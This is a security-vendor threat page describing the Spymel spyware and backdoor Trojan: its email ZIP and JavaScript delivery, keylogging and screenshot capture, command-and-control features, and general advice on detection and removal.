Spymel

Posted: January 13, 2016

Threat Metric

The Threat Meter is a malware assessment that SpywareRemove.com's research team is able to give every identifiable malware threat. Our Threat Meter includes several criteria based off of specific malware threats to value their severity, reach and volume. The Threat Meter is able to give you a numerical breakdown of each threat's initial Threat Level, Detection Count, Volume Count, Trend Path and Percentage Impact. The overall ranking of each threat in the Threat Meter is a basic breakdown of how all threats are ranked within our own extensive malware database. The scoring for each specific malware threat can be easily compared to other emerging threats to draw a contrast in its particular severity. The Threat Meter is a useful tool in the endeavor of seeking a solution to remove a threat or pursue additional analytical research for all types of computer users.

The following fields listed on the Threat Meter containing a specific value, are explained in detail below:

Threat Level: The threat level scale goes from 1 to 10 where 10 is the highest level of severity and 1 is the lowest level of severity. Each specific level is relative to the threat's consistent assessed behaviors collected from SpyHunter's risk assessment model.

Detection Count: The collective number of confirmed and suspected cases of a particular malware threat. The detection count is calculated from infected PCs retrieved from diagnostic and scan log reports generated by SpyHunter.

Volume Count: Similar to the detection count, the Volume Count is specifically based on the number of confirmed and suspected threats infecting systems on a daily basis. High volume counts usually represent a popular threat but may or may not have infected a large number of systems. High detection count threats could lay dormant and have a low volume count. Criteria for Volume Count is relative to a daily detection count.

Trend Path: The Trend Path, utilizing an up arrow, down arrow or equal symbol, represents the level of recent movement of a particular threat. Up arrows represent an increase, down arrows represent a decline and the equal symbol represent no change to a threat's recent movement.

% Impact (Last 7 Days): This demonstrates a 7-day period change in the frequency of a malware threat infecting PCs. The percentage impact correlates directly to the current Trend Path to determine a rise or decline in the percentage.

Threat Level:	8/10
Infected PCs:	35

First Seen:	January 13, 2016
OS(es) Affected:	Windows

Spymel is a spyware program and backdoor Trojan, capable of both collecting specialized information and giving third parties additional access to your PC by installing other threats. The admins behind Spymel's only verified campaign have been responsive to counterattacks by the PC security industry, delivering new updates to keep Spymel out of AV detection databases. However, up-to-date anti-malware tools still should be trusted with identifying and removing Spymel, which malware experts rate as a low-visibility threat that shows few, if any, symptoms of its presence.

The Spymel in Your Mail Today

E-mails have been a favorite delivery method for Trojans and other threats and are particularly notorious for being an infection vector for government and corporate systems. Although some of the subtle details behind such attacks may change, the basic format still is standard, as malware researchers continue seeing in the Spymel campaign. This spyware-based threat installs itself through a Trojan downloader that conceals itself within an e-mail ZIP archive and operates off of JavaScript exploits.

The Trojan downloader includes no code obfuscation and uses a hardcoded payload address, implying that the JavaScript file is a dedicated threat made especially for the Spymel campaign. An overall lack of other, threatening characteristics in this downloader means that most AV solutions to date have issues with identifying Spymel as being hostile. In contrast, Spymel's code is heavily obfuscated and includes additional identification cover in the form of a misappropriated digital certificate. Spymel's admins already have replaced the certificate at least once after its revoking due to actions by third-party actors.

Spymel includes installation formats for multiple versions of Windows. Post-installation, malware researchers identified Spymel's most critical attack features as follows:

Spymel may create screenshots or recordings to capture visual data from your monitor.
Spymel may record keystrokes from your keyboard to collect typed information such as passwords or user names.
More specific attacks than the above also may be accomplished through instructions transferred by Spymel's remote admins. The Command & Control server allows third parties to make other decisions on what information to target, with their actions informed by system information passed along by Spymel automatically.
Although Spymel is clearly a dedicated spyware program, Spymel also includes some Trojan downloader-derived features. Spymel may install other threatening software (of a variable nature, unlike its original, JavaScript downloader) or uninstall itself to hide the infection.
Spymel also joins the numbers of other, advanced threats like the PlugX Trojan and Uroburos by being one of many threats to use a module-based expansion system. One of its current modules, ProtectMe, prevents the user from terminating its memory process, and even may block some memory-managing applications.

Stopping a Spyware Problem Before It Becomes a Multi-Threat Problem

Although PC security companies and owners of digital certificates both can take steps to block the misuse of software-identifying keys, Spymel also shows that the process is an ongoing race where the Trojan administrators sometimes pull ahead of public security measures. Spymel's admins already have proven their willingness to update Spymel in response to threat-identification responses, and keeping your anti-malware and AV products updated may be especially necessary for detecting this threat. Potential targets and, especially, Windows users, also should stay informed about e-mail-based tactics circulating threats, such as fake invoices and other 'business' transactions.

Spymel gives third parties access to both information on your computer and the rest of the system, itself, by installing other threats on an at-will basis. However, like many kinds of professional spyware, Spymel also is not designed for leaving behind symptoms. PC users who have any reason to consider a compromise of their systems should reboot in Safe Mode and run all appropriate anti-malware tools for identifying and deleting Spymel.

Spymel

Threat Metric

The Spymel in Your Mail Today

Stopping a Spyware Problem Before It Becomes a Multi-Threat Problem

Leave a Reply